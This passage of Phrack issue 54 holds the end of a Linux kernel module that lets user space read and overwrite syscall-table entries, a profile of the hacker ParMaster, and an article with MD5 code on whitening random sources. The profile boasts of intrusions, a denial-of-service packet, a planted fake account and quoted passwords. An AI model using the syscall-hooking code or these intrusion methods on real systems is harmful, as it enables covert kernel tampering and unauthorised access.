#endif
#include <syscall.h>
#include <linux/string.h>
#include <linux/types.h>
#include <linux/fs.h>
#include <linux/mm.h>
#include <linux/malloc.h>
#include <linux/dirent.h>
#include <linux/sys.h>
#include <linux/linkage.h>
#include <asm/segment.h>
#include "config.h"
#include "sys_null.h"
extern void *sys_call_table[];
int __NR_mbtrom;
int* funcion( int numero, int modo, unsigned int *address )
{
switch(modo){
case 0:
return sys_call_table[numero];
break;
case 2:
return (void *)&sys_call_table;
case 1:
default:
sys_call_table[numero]=address;
break;
}
return (void *)0;
}
int init_module(void)
{
__NR_mbtrom = NUMERO_VACIO ;
/* Chequea direccion vacia desde NUMERO_VACIO hasta 0 */
while ( __NR_mbtrom!= 0 &&
sys_call_table[__NR_mbtrom] != 0 &&
sys_call_table[__NR_mbtrom] != (void *)SYS_NULL )
__NR_mbtrom--;
if(!__NR_mbtrom ) { /* Si es 0 me voy */
printk("mbtrom: Oh no\n");
return 1;
}
sys_call_table[__NR_mbtrom] = (void *) funcion;
if( __NR_mbtrom != NUMERO_VACIO )
printk("mbtrom: Mmm...\n");
printk("mbtrom: -> %i <-\n",__NR_mbtrom);
return 0;
}
void cleanup_module(void)
{
sys_call_table[__NR_mbtrom] = 0;
printk("mbtrom: Bye.\n");
}
<-->
<++> linenoise/btrom/sys_null.awk
/sys_ni_syscall/ { print "#define SYS_NULL 0x"$1 }
<-->
0x6>-------------------------------------------------------------------------
----[ PDM
Phrack Doughnut Movie (PDM) last issue was `Miller's Crossing`.
PDM53 recipients:
None of you suckers. Go rent it. It's well worth your time.
PDM54 Challenge:
"I have John Murdock... In mind..."
0x7>-------------------------------------------------------------------------
----[ Super Elite People That REad Phrack (SEPTREP)
New addiitons: Ron Rivest, W. Richard Stevens
Why they are SEP: One is the `R` in RSA. The other writes TCP/IP bibles.
----[ Current List
W. Richard Stevens
Ron Rivest
-----------------------------------------------------------------------------
----[ EOF
----[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 04 of 12
-------------------------[ P H R A C K 5 4 P R O P H I L E
-----------------[ Personal
Handle: ParMaster
Call him: Ishmael? SHALL WE PLAY A GAME?
Reach him: Through the grapevine
Past handles: Trouble Verify, Immediate Lee, Bad Karma, Thoth,
Optomystic, (The) Omicron
Handle origin: (Quote from Underground page #104) "Par had got his full
name -The Parmaster- in his earliest hacking days.
Back then, he belonged to a group of teenagers involved
in breaking the copy protections on software programs
for Apple IIe's, particularly games. Par had a
special gift for working out the copy protection
parameters, which was a first step in bypassing the
manufacturers' protection schemes. The ringleader
[sc0tch] of the group [Jedi Hackers] began calling
him 'the master of parameters' -The ParMaster- Par,
for short. As he moved into serious hacking and
developed his expertise in X.25 networks, he kept the
name because it fitted nicely in his new environment.
'Par' was a common command on an X.25 pad, the modem
gateway to an X.25 network."
Date of birth: NOT January 15th!
Age at current date: 27
Height: 5'11"
Weight: 202 lbs
Eye color: Brown
Hair color: Brown (Blonde highlights)
Computers: Dell 320n 386 laptop, Walkabout vt100 terminal with
built-in 2400 baud modem.
Sysop/Co-Sysop of: DarkF0RCE
Admin of: [Withheld]
URLs: http://altavista.digital.com - search - "parmaster" -
- submit - read.
----------------[ Favorite things
Women: Blondes with blue / green eyes. Chicks in skimpy clothes
with accents.
Cars: Ferrari and Porsche clubs :-), anything with a jet
engine on it.
Foods: Chinese, got to have my chinese food. Calamari, Duck,
Quail, most seafood.
Alcohol: Now, we're talkin'. Jim Beam, Jack Daniels, Crown Royal,
Jose Cuervo / Dos Realis, and last but certainly not
least Finlandia!
Music: The The, The Dickies, Underworld, Kraftwerk, Chemical
Brothers, Crystal Method, El Dubarge, CCCP.
Movies: They Live, A fish called wanda, 13 Monkees, Little
Trouble in Big China, 5th Elemental, True Lies,
Killer Klowns from Outer Space, Eraser, Under
Siege, Tetsuo Ironman, WarGames, and Sneakers.
Authors: Immanuel Velikovsky, Piers Anthony, Terry Brooks, James
Gardner, J.R.R. Tolkien and please forgive me for
anyone i'm missing.
Turn Ons: Traveling in my mind with someone i love.
Turn Offs: Pain, agony, hurting and torture.
----------------[ Passions
I enjoy scrying the future and doing the great work. This is a very difficult
thing to describe in itself. Some of you who know me well enough can see it
every once in a while. I'm no artist, but i attempt to do it and sometimes it
expresses itself in artistic ways.
I love hanging out with my friends, sometimes i need to be alone, but time
i spend with my friends is always special.
----------------[ Memorable experiences
When the US Secret Service raided me in 1991 and took all my stuff (the 3rd
time) including the credit reports of the President (iffie) and Vice President
(definitely) of the United States of America. I was in jail in New York
waiting for transport, and was never really threatened or hurt, except once
and it was a major incident for me but i don't think it was influenced by
anyone.
When i did an interview for Coast Weekly Magazine in Monterey County in
1993, after this issue came out things really fell apart for me, people
started being really mean and really dangerous people started doing really
harmful things around me. This article was my one 'play article'. I
mentioned a lot of stuff that was currently going on, including the Clinton
Administration's use and promotion of the new Clipper Chip device.. I wonder
why the guys who did a play article for the San Jose Mercury News didn't
receive the same treatment. My relatives always told me life isn't fair,
until this time i had plenty of reasons to beleieve that but never did.
Incidents following this made me really question how the United States was
changing. It especially made me question who is running the world nowadays
and who they made a decision to hire under them to work in various agencies.
Everything just seemed to have more style before. However, there are also a
lot of cool things with style brought about by this, which may be worth the
hardships in their value.
Using sprite to send an out of bounds packet to port 139 of trv-psitech.com,
the server was down for a little bit, a day or two. The error it responded
with, "Parameter not found".
Creating IRAQ-DEFENSE password PARMASTERG0TTHEM! on tymnet while i was "in".
I'm not sure what effect this had during the time i had set it up during
Operation Desert Shield. I put it out into the computer underground globally
promoting it as an iraqi system i had found. What effect this may have had
during that time i still do not know. Logically all i can assume is that it
managed to put a lot of hackers who tried it, in one place at the time when
they connected to it. As well as promote and possibly move them toward being
aware of any enemy computers they may have hacked. Indeed, on the boards
i was confronted about it... Specifically by Crimson Death who stated in the
posts that it was, in fact, not an iraqi system at all. Interestingly enough
in following posts people responded *WITH* actual network addresses and
hosts of iraqi systems. Too bad at the time all communications were cut.
Most certainly, their access to the outside worlds computers was at least
partially if not totally through Bahrain. Every once in a while i would
periodically check on tymnet's bahrain gateway and monitor traffic there.
For those of you who wonder why i did this, i don't know... I can honestly say
I wasn't in conscious control of what i was doing. I have some theories about
why, some include a higher power others include some pretty crazy stuff like
mind control. I'm leaning somewhat towards the latter because i had some
severe memory problems. I could not remember anything about this until I
was on a phone interview with Joshua Quittner for the Masters of Deception
book, why at that time I recalled it i do not know. I do know that prior
to this time in searching through my memory fervently that I had not
previously at any other time after 1990 thought about or recollected my
actions then. The only thing i remembered was creating ParMasterX75 nui
Password par=tymnet gawd! and that was because the account I had used to
make IRAQ-DEFENSE had mysteriously changed its properties and now was
connected to place calls on the global data network. Prior to that it had
only been able to connect to the select hosts of the WEFA group, its rightful
owner. I only became aware of this because of Corrupt [MOD] pointing out that
I should list out what accounts were active. .. i then saw that he had created
an account which could be used to place data calls. John apparently did
not know that the properties of the account's access had changed and that
it did not have access to do things like that before, if he did he was not
offering that knowledge, or even better he may have changed it :-).
Disneyland.
----------------[ Boards to mention
The board that Mr. Zod set up on the 202 sprintnet system owned by AFOSI and
used to train them on how to catch computer hackers *GUFFAW*, my I wonder
if they ever found out? Weren't we why they called it that? ROFLMFAO
DarkF0RCE, I wonder whatever happened to Derek.. One Man Army.. Hmm, like
people are posting these PC Pursuit codes on our board, i wonder where
they came from? Phear P0STMASTER's ACOS skills. ROFLMFAO
Pegasus, this BBS run on a VAX in switzerland ended up turning out to be part
of a sting operation involving law enforcement in europe.... Why do all these
k-k00l codes still work tho?
Unphamiliar Territories, invalid media's board. Managed to collect together
quite a few people with talent as well as some really stupid asshole narks.
Can anyone say PMF?
Bullet, wherever it is... There you are.
BlackNET, so much has been said about this one in circles its not funny. No
one knows where it is or how to connect to it? I wonder why... I'm confused.
Fuck QSD Channel.
Sectec, this board was always an old stand-by for me when the internet was
taking off.. Now boards with discussions on packet switched nets like it
aren't around. Or, if they are they are hidden and not openly promoting
themselves. Most likely, they are somewhere on the internet...It's probably
just me... but i don't trust the internet... at all.
ALTGER, altos computer systems munich.... i know far too many people from this
board in real life now. 12 years ago I never would have thought that this
would occur or feasibly see how this would happen. It's still mind-boggling
to me. Old skool Apple warez crew: Blue Adept [213], Ubiquitous Hacker,
Hollywood, Vampire, Pirette. Others: Piper, Dr. Who, Shatter, Theorem, Nora,
and Nasa Pilot.
ALTHH, altos computer systems hamburg (later Markt and Technic... tchh), same
as altger but I spent MUCH MUCH more time here. I think this is where I got
the magic. THE crew: Floyd, TTM, Necrovore-Skyhook-backlash-LineShadow-
TouchTone [Xtension], jumpingjackflash, Lutz Pelikan, camelot, pad-gandalf-
fusion-power-etc [8LGM], Force-Phoenix-Nom-etc [The Realm], anthrax, there
are too many people to list here forgive me if I left you out. You know
who you are.
The Phoenix Project, what a cool place, where else could I tease Sandy
Sandquist about FTS.
Illuminati BBS, my account was short lived and i logged in maybe twice. But
where else could i see the latest on AD&D games with, The Mentor, Erik
Bloodaxe, etc.
The initial r00t homepage, boy was this a funny joke. Wait, i'm at a con
and now its all real and there's like 40 people here. These people are
smart and make lots of money. Hosaka and T3... You could not have known it
would turn into this. r00t people who kick ass: Number one for all time -
glyph a.k.a necrovore, alhambra, oghost, redragon [tacobell.com], and daemon9.
Ripco, well I wasn't on here a lot but it played such an important part in the
computer underground over the years i have to at least mention it. It must
have also been my first exposure to l0ck. Tons of other people here, this
place kept lots of Text files circulating in the underground that might
have otherwise been lost.
----------------[ Quotes
"I didn't mean for your daddy to spooge all over the minnie mouse pillow on
your bed, it wasn't my fault, i told him he could cum in my ass" -- Vamprella
"No." -- Agent Steal
"Remember when i did that class change for you?" -- U4EA
"How did you know i was gonna say that about butter?" -- Nirva
"I got approval from Uli to start Chaos Computer Club West, want to be in
it?" -- Doc Holiday
"Bilbo Baggins, how are youuuuuu" -- Torquemada
----------------[ The future of the computer underground
The future? Hmm. Am I the guy to ask? Maybe. Things have changed a lot,
the only thing constant is change. It seems there is less chivalry nowadays.
The government and corporations painted a picture of us. That picture is
not a pretty one. They even have a general psychiatric profile we are all
supposed to fall into. Movies, like "Hackers" portray us a certain way
also. Kids just starting out, see this and immediately it becomes the way
the underground is. The Masters of Deception also promoted this image of
the Computer Underground. We end up fighting ourselves more than working
together to accomplish goals. I remember a time when things weren't like
that. There was very little confrontation between hackers, and information
flowed freely. If you ask me, its all a big conspiracy :-). A big conspiracy
to keep hackers seperated and fighting among themselves. People like to talk
to me about the good old days. Thats all well and good, but those days are
over. There can still be another golden age in the Computer Underground.
The only thing stopping it, is you.
----[ EOF
---[ Phrack Magazine Volume 8, Issue 54 Dec 25th, 1998, article 05 of 12
-------------------------[ Linux and Random Source Bleaching
--------[ Phunda Menta <phundie@usa.net>
----[ Introduction
Random numbers are often used in cryptography, but good random bits can be
hard to come by. Linux has two useful pseudo-devices called /dev/random and
/dev/urandom. Catting /dev/random yields a small pool of random bits obtained
from internal system state. If you cat this output to your terminal and bang
on some keys, you'll notice that you get more random bits. Disk drive
accesses, IRQ timings, and key presses; all of this stuff gets hashed into
a small pool of entropy that can be accessed directly from /dev/random.
/dev/urandom is a stream that hashes /dev/random, and gives you that hash
value; then it hashes the last hash and the pool forever. Both give a
decent source of random bits. By default, /dev/urandom uses SHA (I know
the source comments claim MD5, but if you look at the code, it is SHA).
So /dev/urandom is a decent source of pseudo-random bits. /dev/random
is better, but it is of limited size.
These are very useful, but what we really want is a hardware source of random
bits.
----[ The Hardware Solution
Most computers have sound cards these days, and a sound card is a
great source of potential entropy.
Unplug the microphone from your soundcard and cat /dev/audio to a file.
Sample maybe 2 or 300k of data. Now play it back, if it sounds like static,
you can skip ahead to cleaning up the source. You can also try plugging a
1/8th jack (or whatever you use for input) that has dead-end leads into
the mic port. Try both of these methods and find one that gives a clean
static hiss.
Chances are that on playback all you have is silence, but we want static.
Static is random, and randomness is our goal here, so grab an FM radio and
tune it to the high end, around 106 or 107 MHz. Find a frequency that gives a
good clean hiss, an analog tuner is best for this. If you have a digital
tuner and can't get the precision needed to tune-in a good static source then
get the best static you can, but you might have a harder time cleaning up this
source. If your signal has a high-pitched tone present you can clean this out
in a few different ways. The easiest is to use software to strip out that
frequency. There is a family of programs for Linux that can help with this
(Bio, Mammut, and Ceres). These programs allow very good visualization of the
signal and they also allow you to pull the signal apart and isolate different
frequencies. Chances are you will have a bunch of junk in the 60 Hz region,
probably due to EMI (electro-magnetic interference) from power supplies, along
with whatever is giving you that tone.
In either case you should shield your FM receiver and the audio cable to avoid
EMI. You may be able you shield your soundcard, but I am skeptical of the
worth of this. A lot of electronics supply houses sell shielding wrap and
preshielded cables. You can also try aluminum foil. I haven't had much luck
with aluminum foil, but some people swear by it.
Once you have your source set up, jack it into your sound card and sample it
at 44 kHz. Run the results through the Diehard testing package (a battery of
tests to evaluate the strength of random number generators). Your source
won't pass the test.
Clean up your source bytes however you need to. Strip out any 60 Hz junk with
Mammut by using the Transform|Filter options, you can then use the
Transform|Phase Shift option to slide the wave form back into place so that
there is no gap at 60 Hz. If your static source has a small amplitude, crank
it up by increasing the hardware gain, or use Mammut to change the derivative
or the effective gain, whichever you like. I have found no empirical evidence
to suggest that one way works better than the others, but, theoretically,
changing the slope may be a Bad Thing (tm). You may also want to use the
Phase Shift and Threshold options to chop up your signal. You can
resynthesize the parts and save them back out. Listening to these parts, and
graphing them can help give you an idea of what other things your source
signal is doing.
If push comes to shove, and you can't weed out all of the bias, or if you need
a more hands-free way to clean up the source (and don't have the time or skill
to write custom filters) you can just use a cryptographic hash.
After you clean up your source, take a look at it with ceres or bio, if the
output looks like video static with no noticeable patterns or hot/cold areas
then you have sufficiently cleaned up the signal, now you can move on to
bleaching the static for use as a random number stream.
As a side note, if you ever want to see what a good random distribution is
supposed to look like, you can also use output from /dev/urandom. Use sox
(stock with Redhat distros) to convert the output stream of /dev/urandom
(use a type of 'ul') to AIFF for mammut, or ceres or whatever. The
distribution given by /dev/urandom is statistically random so it will tell us
what to look for, but /dev/urandom (SHA, basically) is still pseudo-random
since complete knowledge of the previous inputs allows us to calculate all
future outputs. This is not so with static.
----[ Bleaching the data stream
The static coming out of your FM source is skewed white noise. We need to
clean it up, so we bleach it.
RFC1750 gives a slew of methods to clean up your source. One of the simplest,
effective methods of whitening a source is to XOR all the bits in a byte
together, yielding one output bit. These bits are then reconstructed into
a byte and output. This method has a few advantages. The first big advantage
is that you know precisely how many bytes you need to sample in order obtain a
certain number of output bytes. XORing is also fast, and easy to implement.
Another method of deskewing data is attributed to John von Neumann in RFC1750.
This method is called transition mapping. Transition mapping is a relatively
simple process. We take two bits from our input. If this bit sequence is 01
or 10 we output a 0 or a 1, respectively. The sequences 00 and 11 are
discarded. This method completely deskews a stream of data at the expense
of needing an unknown number of input bits. Transition mapping is also a
very fast process, and on a lightly skewed input transition mapping can yield
more output bits than XOR.
Both XOR and transition mapping are fast processes that are good enough to
deskew a set of bits such that they will pass the Diehard suite of tests,
if the input is suitably clean and random. If the input is somehow correlated,
you will have a harder time getting it to pass Diehard. I have found that
correlated sources can be cleaned up by XORing the output of an XOR
distillation with the output of a transition mapped distillation.
Slower constructions can be created out of cryptographic hash functions,
but may be trusted more by the paranoid. Hash functions are also recommended
if an attacker has the means to somehow affect your random source. If you
are worried about this attack, a good way to solve it is with appeal to
/dev/random. Use a block cipher such as 3DES to encrypt your random
source with a key and initialization vector obtained from /dev/random. If an
attacker can bias your source in a predictable way, he still has no idea
what bytes you may be using for your actual random numbers. Skew that the
attack may introduce into your hardware can first be cleaned with a process
like transition mapping and then pumped through a looped hash function or a
block cipher.
The output of a (decent) hash function or block cipher will pass the
Diehard tests.
In a heavily used machine, where the entropy pool used by /dev/random will be
updated frequently, the output from the above processes can be XORed byte
for byte with the stream from /dev/urandom. This is a simple method to mix
the streams together for added security. Another method would be to hash
N/2 bytes from /dev/urandom and N/2 bytes from your source together, where
N is the number of bytes that your hash function will yield.
All of these methods are suitable to deskew a data set, but they should not be
used blindly. Before putting the resulting bits to use, examine several
samples with Diehard and graphic or spectral tests.
I have included code to do XOR, transition mapping along with hashing
mechanisms.. I have plenty of code to do other hash and block cipher based
stuff too, but I did not include that here because the code is not
self-contained (it needs some crypto libs).
If you want to contact me about the code or if you have some comments or
suggestions, I can be reached at phundie@usa.net.
----[ References and Related stuff:
RFC1750 Randomness Recommendations for Security
http://www.kobira.co.jp/document/rfc/RFC1750.txt
Diehard Test Suite
http://stat.fsu.edu/~geo/diehard.html
Pseudo-Random Number Conditioning
http://www.clark.net/pub/cme/html/ranno.html
Linux MIDI & Sound Applications (has links to Mammut, Bio and Ceres)
http://www.bright.net/~dlphilp/linux_soundapps.html
----[ The code
<++> bleach/Makefile
all:
gcc -w -c md5/md5.c
gcc -c sha/shs.c
gcc -o sha_distill sha_distill.c shs.o
gcc -o md5_distill md5_distill.c md5.o
gcc -o xor_distill xor_distill.c
gcc -o transmap transmap.c
<-->
<++> bleach/md5/md5.c
/*
***********************************************************************
** md5.c -- the source code for MD5 routines **
** RSA Data Security, Inc. MD5 Message-Digest Algorithm **
** Created: 2/17/90 RLR **
** Revised: 1/91 SRD,AJ,BSK,JT Reference C ver., 7/10 constant corr. **
***********************************************************************
*/
/*
***********************************************************************
** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved. **
** **
** License to copy and use this software is granted provided that **
** it is identified as the "RSA Data Security, Inc. MD5 Message- **
** Digest Algorithm" in all material mentioning or referencing this **
** software or this function. **
** **
** License is also granted to make and use derivative works **
** provided that such works are identified as "derived from the RSA **
** Data Security, Inc. MD5 Message-Digest Algorithm" in all **
** material mentioning or referencing the derived work. **
** **
** RSA Data Security, Inc. makes no representations concerning **
** either the merchantability of this software or the suitability **
** of this software for any particular purpose. It is provided "as **
** is" without express or implied warranty of any kind. **
** **
** These notices must be retained in any copies of any part of this **
** documentation and/or software. **
***********************************************************************
*/
#include "md5.h"
/*
***********************************************************************
** Message-digest routines: **
** To form the message digest for a message M **
** (1) Initialize a context buffer mdContext using MD5Init **
** (2) Call MD5Update on mdContext and M **
** (3) Call MD5Final on mdContext **
** The message digest is now in mdContext->digest[0...15] **
***********************************************************************
*/
/* forward declaration */
static void Transform ();
static unsigned char PADDING[64] = {
0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
/* F, G, H and I are basic MD5 functions */
#define F(x, y, z) (((x) & (y)) | ((~x) & (z)))
#define G(x, y, z) (((x) & (z)) | ((y) & (~z)))
#define H(x, y, z) ((x) ^ (y) ^ (z))
#define I(x, y, z) ((y) ^ ((x) | (~z)))
/* ROTATE_LEFT rotates x left n bits */
#define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n))))
/* FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4 */
/* Rotation is separate from addition to prevent recomputation */
#define FF(a, b, c, d, x, s, ac) \
{(a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define GG(a, b, c, d, x, s, ac) \
{(a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define HH(a, b, c, d, x, s, ac) \
{(a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
#define II(a, b, c, d, x, s, ac) \
{(a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \
(a) = ROTATE_LEFT ((a), (s)); \
(a) += (b); \
}
/* The routine MD5Init initializes the message-digest context
mdContext. All fields are set to zero.
*/
void MD5Init (mdContext)
MD5_CTX *mdContext;
{
mdContext->i[0] = mdContext->i[1] = (UINT4)0;
/* Load magic initialization constants.
*/
mdContext->buf[0] = (UINT4)0x67452301;
mdContext->buf[1] = (UINT4)0xefcdab89;
mdContext->buf[2] = (UINT4)0x98badcfe;
mdContext->buf[3] = (UINT4)0x10325476;
}
/* The routine MD5Update updates the message-digest context to
account for the presence of each of the characters inBuf[0..inLen-1]
in the message whose digest is being computed.
*/
void MD5Update (mdContext, inBuf, inLen)
MD5_CTX *mdContext;
unsigned char *inBuf;
unsigned int inLen;
{
UINT4 in[16];
int mdi;
unsigned int i, ii;
/* compute number of bytes mod 64 */
mdi = (int)((mdContext->i[0] >> 3) & 0x3F);
/* update number of bits */
if ((mdContext->i[0] + ((UINT4)inLen << 3)) < mdContext->i[0])
mdContext->i[1]++;
mdContext->i[0] += ((UINT4)inLen << 3);
mdContext->i[1] += ((UINT4)inLen >> 29);
while (inLen--) {
/* add new character to buffer, increment mdi */
mdContext->in[mdi++] = *inBuf++;
/* transform if necessary */
if (mdi == 0x40) {
for (i = 0, ii = 0; i < 16; i++, ii += 4)
in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
(((UINT4)mdContext->in[ii+2]) << 16) |
(((UINT4)mdContext->in[ii+1]) << 8) |
((UINT4)mdContext->in[ii]);
Transform (mdContext->buf, in);
mdi = 0;
}
}
}
/* The routine MD5Final terminates the message-digest computation and
ends with the desired message digest in mdContext->digest[0...15].
*/
void MD5Final (mdContext)
MD5_CTX *mdContext;
{
UINT4 in[16];
int mdi;
unsigned int i, ii;
unsigned int padLen;
/* save number of bits */
in[14] = mdContext->i[0];
in[15] = mdContext->i[1];
/* compute number of bytes mod 64 */
mdi = (int)((mdContext->i[0] >> 3) & 0x3F);
/* pad out to 56 mod 64 */
padLen = (mdi < 56) ? (56 - mdi) : (120 - mdi);
MD5Update (mdContext, PADDING, padLen);
/* append length in bits and transform */
for (i = 0, ii = 0; i < 14; i++, ii += 4)
in[i] = (((UINT4)mdContext->in[ii+3]) << 24) |
(((UINT4)mdContext->in[ii+2]) << 16) |
(((UINT4)mdContext->in[ii+1]) << 8) |
((UINT4)mdContext->in[ii]);
Transform (mdContext->buf, in);
/* store buffer in digest */
for (i = 0, ii = 0; i < 4; i++, ii += 4) {
mdContext->digest[ii] = (unsigned char)(mdContext->buf[i] & 0xFF);
mdContext->digest[ii+1] =
(unsigned char)((mdContext->buf[i] >> 8) & 0xFF);
mdContext->digest[ii+2] =
(unsigned char)((mdContext->buf[i] >> 16) & 0xFF);
mdContext->digest[ii+3] =
(unsigned char)((mdContext->buf[i] >> 24) & 0xFF);
}
}
/* Basic MD5 step. Transforms buf based on in.
*/
static void Transform (buf, in)
UINT4 *buf;
UINT4 *in;
{
UINT4 a = buf[0], b = buf[1], c = buf[2], d = buf[3];
/* Round 1 */
#define S11 7
#define S12 12
#define S13 17
#define S14 22
FF ( a, b, c, d, in[ 0], S11, 3614090360); /* 1 */
FF ( d, a, b, c, in[ 1], S12, 3905402710); /* 2 */
FF ( c, d, a, b, in[ 2], S13, 606105819); /* 3 */
FF ( b, c, d, a, in[ 3], S14, 3250441966); /* 4 */
FF ( a, b, c, d, in[ 4], S11, 4118548399); /* 5 */
FF ( d, a, b, c, in[ 5], S12, 1200080426); /* 6 */
FF ( c, d, a, b, in[ 6], S13, 2821735955); /* 7 */
FF ( b, c, d, a, in[ 7], S14, 4249261313); /* 8 */
FF ( a, b, c, d, in[ 8], S11, 1770035416); /* 9 */
FF ( d, a, b, c, in[ 9], S12, 2336552879); /* 10 */
FF ( c, d, a, b, in[10], S13, 4294925233); /* 11 */
FF ( b, c, d, a, in[11], S14, 2304563134); /* 12 */
FF ( a, b, c, d, in[12], S11, 1804603682); /* 13 */
FF ( d, a, b, c, in[13], S12, 4254626195); /* 14 */
FF ( c, d, a, b, in[14], S13, 2792965006); /* 15 */
FF ( b, c, d, a, in[15], S14, 1236535329); /* 16 */
/* Round 2 */
#define S21 5
#define S22 9
#define S23 14
#define S24 20
GG ( a, b, c, d, in[ 1], S21, 4129170786); /* 17 */
GG ( d, a, b, c, in[ 6], S22, 3225465664); /* 18 */
GG ( c, d, a, b, in[11], S23, 643717713); /* 19 */
GG ( b, c, d, a, in[ 0], S24, 3921069994); /* 20 */
GG ( a, b, c, d, in[ 5], S21, 3593408605); /* 21 */
GG ( d, a, b, c, in[10], S22, 38016083); /* 22 */
GG ( c, d, a, b, in[15], S23, 3634488961); /* 23 */
GG ( b, c, d, a, in[ 4], S24, 3889429448); /* 24 */
GG ( a, b, c, d, in[ 9], S21, 568446438); /* 25 */
GG ( d, a, b, c, in[14], S22, 3275163606); /* 26 */
GG ( c, d, a, b, in[ 3], S23, 4107603335); /* 27 */
GG ( b, c, d, a, in[ 8], S24, 1163531501); /* 28 */
GG ( a, b, c, d, in[13], S21, 2850285829); /* 29 */
GG ( d, a, b, c, in[ 2], S22, 4243563512); /* 30 */
GG ( c, d, a, b, in[ 7], S23, 1735328473); /* 31 */
GG ( b, c, d, a, in[12], S24, 2368359562); /* 32 */
/* Round 3 */
#define S31 4
#define S32 11
#define S33 16
#define S34 23
HH ( a, b, c, d, in[ 5], S31, 4294588738); /* 33 */
HH ( d, a, b, c, in[ 8], S32, 2272392833); /* 34 */
HH ( c, d, a, b, in[11], S33, 1839030562); /* 35 */
HH ( b, c, d, a, in[14], S34, 4259657740); /* 36 */
HH ( a, b, c, d, in[ 1], S31, 2763975236); /* 37 */
HH ( d, a, b, c, in[ 4], S32, 1272893353); /* 38 */
HH ( c, d, a, b, in[ 7], S33, 4139469664); /* 39 */
HH ( b, c, d, a, in[10], S34, 3200236656); /* 40 */
HH ( a, b, c, d, in[13], S31, 681279174); /* 41 */
HH ( d, a, b, c, in[ 0], S32, 3936430074); /* 42 */
HH ( c, d, a, b, in[ 3], S33, 3572445317); /* 43 */
HH ( b, c, d, a, in[ 6], S34, 76029189); /* 44 */
HH ( a, b, c, d, in[ 9], S31, 3654602809); /* 45 */
HH ( d, a, b, c, in[12], S32, 3873151461); /* 46 */
HH ( c, d, a, b, in[15], S33, 530742520); /* 47 */
HH ( b, c, d, a, in[ 2], S34, 3299628645); /* 48 */
/* Round 4 */
#define S41 6
#define S42 10
#define S43 15
#define S44 21
II ( a, b, c, d, in[ 0], S41, 4096336452); /* 49 */
II ( d, a, b, c, in[ 7], S42, 1126891415); /* 50 */
II ( c, d, a, b, in[14], S43, 2878612391); /* 51 */
II ( b, c, d, a, in[ 5], S44, 4237533241); /* 52 */
II ( a, b, c, d, in[12], S41, 1700485571); /* 53 */
II ( d, a, b, c, in[ 3], S42, 2399980690); /* 54 */
II ( c, d, a, b, in[10], S43, 4293915773); /* 55 */
II ( b, c, d, a, in[ 1], S44, 2240044497); /* 56 */
II ( a, b, c, d, in[ 8], S41, 1873313359); /* 57 */
II ( d, a, b, c, in[15], S42, 4264355552); /* 58 */
II ( c, d, a, b, in[ 6], S43, 2734768916); /* 59 */
II ( b, c, d, a, in[13], S44, 1309151649); /* 60 */
II ( a, b, c, d, in[ 4], S41, 4149444226); /* 61 */
II ( d, a, b, c, in[11], S42, 3174756917); /* 62 */
II ( c, d, a, b, in[ 2], S43, 718787259); /* 63 */
II ( b, c, d, a, in[ 9], S44, 3951481745); /* 64 */
buf[0] += a;
buf[1] += b;
buf[2] += c;
buf[3] += d;
}
/*
***********************************************************************
** End of md5.c **
******************************** (cut) ********************************
*/
<-->
<++> bleach/md5/md5c.h
/*
***********************************************************************
** md5.h -- header file for implementation of MD5 **
** RSA Data Security, Inc. MD5 Message-Digest Algorithm **
** Created: 2/17/90 RLR **
** Revised: 12/27/90 SRD,AJ,BSK,JT Reference C version **
** Revised (for MD5): RLR 4/27/91 **
** -- G modified to have y&~z instead of y&z **
** -- FF, GG, HH modified to add in last register done **
** -- Access pattern: round 2 works mod 5, round 3 works mod 3 **
** -- distinct additive constant for each step **
** -- round 4 added, working mod 7 **
***********************************************************************
*/
/*
***********************************************************************
** Copyright (C) 1990, RSA Data Security, Inc. All rights reserved. **
** **
** License to copy and use this software is granted provided that **
** it is identified as the "RSA Data Security, Inc. MD5 Message- **
** Digest Algorithm" in all material mentioning or referencing this **
** software or this function. **
** **
** License is also granted to make and use derivative works **
** provided that such works are identified as "derived from the RSA **
** Data Security, Inc. MD5 Message-Digest Algorithm" in all **
** material mentioning or referencing the derived work. **
** **
** RSA Data Security, Inc. makes no representations concerning **
** either the merchantability of this software or the suitability **
** of this software for any particular purpose. It is provided "as **
** is" without express or implied warranty of any kind. **
** **
** These notices must be retained in any copies of any part of this **
** documentation and/or software. **
***********************************************************************
*/
/* typedef a 32-bit type */
typedef unsigned long int UINT4;
/* Data structure for MD5 (Message-Digest) computation */
typedef struct {
UINT4 i[2]; /* number of _bits_ handled mod 2^64 */
UINT4 buf[4]; /* scratch buffer */
unsigned char in[64]; /* input buffer */
unsigned char digest[16]; /* actual digest after MD5Final call */
} MD5_CTX;
void MD5Init ();
void MD5Update ();
void MD5Final ();
/*
***********************************************************************
** End of md5.h **
******************************** (cut) ********************************
*/
<-->
<++> bleach/md5_distill.c
#include <stdio.h>
#include "md5/md5.h"
main ()
{
MD5_CTX md5Info;
unsigned char c[16];
while (fread(c, 1,16,stdin) == 16)
{
MD5Init(&md5Info);
MD5Update(&md5Info,c,16);
MD5Final(&md5Info);
fwrite(md5Info.digest,1,16,stdout);
}
}
<-->
<++> bleach/sha/shs.c
/* --------------------------------- SHS.C ------------------------------- */
/*
* NIST proposed Secure Hash Standard.
*
* Written 2 September 1992, Peter C. Gutmann.
* This implementation placed in the public domain.
*
